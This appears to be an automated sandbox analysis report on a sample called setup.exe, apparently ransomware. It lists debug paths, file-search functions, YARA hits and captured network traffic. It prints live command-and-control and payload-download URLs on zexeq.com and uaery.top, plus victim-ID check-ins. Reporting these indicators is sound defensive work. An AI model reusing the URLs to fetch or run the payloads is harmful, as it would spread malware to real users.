        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: setup.exe, 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\< source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2710455878.0000000003948000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724383296.0000000003969000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724018230.0000000003950000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723254796.0000000003949000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-BE\od.pdb\ source: setup.exe, 00000007.00000003.2785158322.0000000003AEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\C2\*B source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2782379959.0000000003A86000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\) source: setup.exe, 00000007.00000003.2711853010.00000000036E8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685562013.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685409736.00000000036D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\21\j? source: setup.exe, 00000007.00000003.2724257991.0000000003929000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\kSf6 source: setup.exe, 00000007.00000003.2764644897.00000000039FD000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764499764.00000000039D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[l source: setup.exe, 00000007.00000003.2773335640.0000000003B02000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2779194875.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2779024019.0000000003ABF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\3\J` source: setup.exe, 00000007.00000003.2626657794.0000000003180000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\"<~ \ source: setup.exe, 00000007.00000003.2724257991.0000000003929000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\t source: setup.exe, 00000007.00000003.2774727040.0000000003A44000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773962244.0000000003A3D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qapo source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\3\ source: setup.exe, 00000007.00000003.2743351263.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\p\*\ source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\< source: setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684849989.0000000003640000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\o@ source: setup.exe, 00000007.00000003.2768965443.000000000398D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768366694.000000000396F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764452722.0000000003961000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\O2 source: setup.exe, 00000007.00000003.2768648555.0000000003AA6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774492589.0000000003A75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774727040.0000000003A76000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773962244.0000000003A3D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\s\ source: setup.exe, 00000007.00000003.2686703862.0000000003182000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684970587.0000000003177000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2626657794.0000000003180000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: setup.exe, 00000007.00000003.2742372787.0000000003960000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764452722.0000000003961000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2723110611.0000000003751000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724191836.000000000375B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\k source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\) source: setup.exe, 00000007.00000003.2785762338.0000000003665000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\\ source: setup.exe, 00000007.00000003.2785158322.0000000003AEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\$ source: setup.exe, 00000007.00000003.2773242341.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2772716906.00000000039EC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\y source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qapoS source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorCache\SettingsCache.txt.qapotxt source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\ source: setup.exe, 00000007.00000003.2743511663.0000000003763000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723110611.0000000003751000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724191836.000000000375B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742307025.0000000003749000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\T source: setup.exe, 00000007.00000003.2774886309.0000000003AE6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2779024019.0000000003ABF000.00000004.00000020.00020000.00000000.sdmp

        Spreading

        barindex
        Source: C:\Users\user\Desktop\setup.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,7_2_0040F730
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,7_2_00410160
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,7_2_0040FB98
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\geo[1].jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Jump to behavior

        Networking

        barindex
        Source: Malware configuration extractorURLs: http://zexeq.com/test2/get.php
        Source: C:\Users\user\Desktop\setup.exeFile created: build3[1].exe.7.dr
        Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040CF10
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
        Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
        Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
        Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
        Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
        Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
        Source: setup.exe, 00000007.00000003.2375664025.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
        Source: setup.exe, 00000007.00000003.2376005794.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
        Source: setup.exe, 00000007.00000003.2376124786.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
        Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
        Source: global trafficDNS traffic detected: DNS query: uaery.top
        Source: global trafficDNS traffic detected: DNS query: zexeq.com
        Source: setup.exe, 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
        Source: setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://uaery.top/dl/build2.exe$run
        Source: setup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://uaery.top/dl/build2.exeA
        Source: setup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://uaery.top/dl/build2.exee
        Source: setup.exe, 00000007.00000003.2375375842.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
        Source: setup.exe, 00000007.00000003.2375739601.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
        Source: setup.exe, 00000007.00000003.2375802457.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
        Source: setup.exe, 00000007.00000003.2375877221.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
        Source: setup.exe, 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
        Source: setup.exe, 00000007.00000003.2375940576.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
        Source: setup.exe, 00000007.00000003.2376005794.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
        Source: setup.exe, 00000007.00000003.2376065739.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
        Source: setup.exe, 00000007.00000003.2376124786.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
        Source: setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe
        Source: setup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$run
        Source: setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runpayinstall010921_delay_800_sec.exe2
        Source: setup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runpayinstall010921_delay_800_sec.exe2EE
        Source: setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe9
        Source: setup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php
        Source: setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=trueL
        Source: setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=truea
        Source: setup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.phper
        Source: setup.exe, 00000002.00000002.2117422430.0000000000785000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2256293497.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2256293497.000000000076A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337567990.000000000093B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337567990.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
        Source: setup.exe, 00000011.00000002.2337567990.000000000093B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337567990.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
        Source: setup.exe, 0000000C.00000002.2256293497.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json:
        Source: setup.exe, 0000000C.00000002.2256293497.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonb
        Source: setup.exe, 00000011.00000002.2337567990.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonl
        Source: setup.exe, 00000002.00000002.2117422430.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonp
        Source: setup.exe, 0000000C.00000002.2256293497.000000000076A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsony
        Source: setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/m
        Source: setup.exe, 0000000C.00000002.2256293497.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/~S
        Source: setup.exe, 00000007.00000002.2791061138.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2376242273.0000000003580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://opendgame.ddns.net/endgame
        Source: 58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.7.drString found in binary or memory: https://substrate.office.com
        Source: setup.exe, 00000007.00000002.2791061138.00000000030FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-zUVSNg4K
        Source: setup.exe, 00000007.00000002.2791061138.00000000030FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-zUVSNg4K;
        Source: setup.exe, 00000007.00000003.2789064304.0000000000693000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2791061138.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-zUVSNg4KRZ
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,2_2_004822E0
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crlJump to dropped file

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7036, type: MEMORYSTR
        Source: Yara matchFile source: 7.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.setup.exe.20d15a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.setup.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.setup.exe.20115a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.setup.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.setup.exe.20715a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.setup.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.setup.exe.20d15a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.setup.exe.20715a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.setup.exe.20115a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.setup.exe.20b15a0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.setup.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.setup.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.setup.exe.20b15a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: setup.exe PID: 3604, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: setup.exe PID: 6316, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: setup.exe PID: 6864, type: MEMORYSTR
